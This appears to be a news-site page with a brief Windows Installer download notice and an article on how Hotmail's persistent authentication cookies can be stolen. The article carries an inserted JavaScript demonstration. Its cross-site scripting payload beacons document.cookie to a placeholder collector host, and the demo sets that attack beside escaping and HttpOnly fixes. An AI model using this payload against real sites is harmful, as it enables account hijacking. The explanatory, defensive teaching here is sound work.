The Microsoft Windows Installer is an installation and configuration service that ships as part of the Microsoft Windows 2000 operating system, and is provided as a redistributable product for Microsoft Windows 95, 98, ME, and NT version 4.0.
    "Windows Installer enables software users to efficiently install and configure products and applications. The installer can also provide software products with new capabilities to advertise features without installing them, to install products on demand, and to add user customizations. The Windows Installer supports advertisement of applications and features according to the operating system".


News source: Warp2Search
Download: Microsoft Windows Installer v2.0.2600.2 for Win 9x /ME /NT4


Security experts said today that the Hotmail vulnerability exposes the risks of relying on browser cookies as the digital keys to Internet sites.

Cookies, the small data files placed on an Internet user's computer when visiting websites, are primarily used to identify visitors for the purpose of customizing content such as advertising. But many sites, including Hotmail, also rely on cookies for more serious authentication purposes.

For such sites, the cookie is akin to an ATM banking card that doesn't also require the holder to provide a password. Lose the "card" and you may give up your security.

"Cookies were never designed to be an authentication mechanism. But anyone trying to deploy a Web application today doesn't really have much choice," said Marc Slemko, a Seattle-based security expert who has previously discovered cookie-related security problems at Microsoft's Passport service.

Without physical access to a PC, how big a hurdle is stealing Hotmail cookies? "Trivial," said Slemko, who pointed out years ago how cross-site scripting flaws can be exploited to perform attacks such as pilfering cookies.

What's more, security bugs in Internet Explorer make robbing a remote user of his Hotmail cookies a snap, according to Thor Larholm, a Danish programmer and security specialist who has compiled a list of IE browser flaws, many of which allow cookie-snatching exploits.

"I would say that a malicious programmer's day-to-day chances at successfully stealing the target's cookies lie between very easy and easy," said Larholm, noting that browser cookies are stored unencrypted and in a fixed location.
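The attack Slemko and Larholm describe, as an added example that is not part of the Wired News article: a page that echoes a query parameter into HTML without escaping it lets an attacker's script run in the victim's origin, where document.cookie is readable. The collector host name, the cookie values and the "victim browser" simulation are all constructed for the demo; the cookie names MSPAuth and MSPProf are the ones the article names.

```javascript
// Constructed attacker payload. In a real attack it would be delivered in a
// link the victim clicks; here it is just a string. The collector host is a
// placeholder, not a real service.
const PAYLOAD =
  '<script>new Image().src="http://collector.example/?c="' +
  '+encodeURIComponent(document.cookie)</script>';

// Minimal HTML escaping for text nodes and attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the user-controlled value is concatenated straight into markup,
// so a value containing <script> becomes a script element in the page.
function renderGreetingVulnerable(name) {
  return `<html><body><h1>Hello ${name}</h1></body></html>`;
}

// Hardened: the same value is escaped first, so it renders as literal text.
function renderGreetingSafe(name) {
  return `<html><body><h1>Hello ${escapeHtml(name)}</h1></body></html>`;
}

// True if the rendered page contains a live script element.
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Simulate what the victim's browser would do on load: find the first
// script element and run its body with a fake document (constructed cookie
// jar) and a fake Image whose src setter records the outgoing request URL.
// Returns the list of beacon URLs the attacker would receive.
function simulateVictim(html) {
  const fakeDocument = { cookie: "MSPAuth=abc; MSPProf=def" };
  const beacons = [];
  class FakeImage {
    set src(url) { beacons.push(url); }
  }
  const m = /<script\b[^>]*>([\s\S]*?)<\/script>/i.exec(html);
  if (m) new Function("document", "Image", m[1])(fakeDocument, FakeImage);
  return beacons;
}

// Walk through both renderings with the same payload.
function demo() {
  return {
    vulnerableLeaks: simulateVictim(renderGreetingVulnerable(PAYLOAD)),
    safeLeaks: simulateVictim(renderGreetingSafe(PAYLOAD)),
  };
}
```

Running demo() shows the vulnerable page sending one beacon that carries both cookie values to the collector, while the escaped page sends none. Output escaping is the fix on the site's side; on the cookie side, marking the authentication cookie HttpOnly (supported by browsers from Internet Explorer 6 SP1 onward) keeps it out of document.cookie and therefore out of reach of this payload, though not of other browser flaws.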

According to Slemko, most sites that rely on cookies to authenticate users -- including online banks, brokerages, and e-commerce sites -- typically design the tokens to expire after a logged-in user has been inactive for a few minutes.

But in an apparent effort to boost convenience for its users, Hotmail allows users to make their authentication cookies practically permanent.

At the Web-mail service, a half dozen cookies are written to the hard disk when the user clicks the "keep me signed in" option while logging in to the service. The option is designed to relieve Hotmail users of being nagged for a password each time they check their mail throughout the day.

Two of the cookies, set by MSN.com and named "MSPAuth" and "MSPProf," are the digital keys that allow an attacker to access the interior pages of a Hotmail account without being prompted to sign in, and to read and send messages from the account and change the account holder's preferences.

In tests by Wired News, the Hotmail cookies appeared to stay on the PC unless the user clicked the "Sign Out .NET" button or rebooted the computer. Merely closing the browser did not delete them.

According to Slemko, the Hotmail cookie problem could stem from a bug in an optional feature offered by the service. Hotmail enables users to configure a "session expiration" option that promises to "automatically end" the user's session after a specified time interval.

But even with the expiration option enabled at its most secure setting, testing by Wired News showed that a cookie could be exported to another computer and still used to authenticate a password-less Hotmail login 24 hours later.

Aside from correcting the session expiration bug, Slemko said there's little Microsoft can do to guard Hotmail users against cookie attacks.

"They are balancing convenience and security. If they added, for example, another layer of checks with the central Passport servers, the whole system would become even slower and more unreliable," Slemko said.

Since Hotmail is designed to allow users to access their accounts from any computer anywhere, the service's authentication cookies do not appear to constrain access based on a user's Internet Protocol address, according to Glover.

A Hotmail user's best defense against cookie robbers, Glover said, is to shun the "keep me signed in" option, and to follow Microsoft's advice and click the service's sign-out icon when finished with a Hotmail session. But Glover said such tactics will require a change of habits for Hotmail users.

"I hypothesize that the majority of them sign on first thing in the morning and stay logged in to their Hotmail accounts all day. I don't think they realize this is setting them up to have their identities stolen," he said.
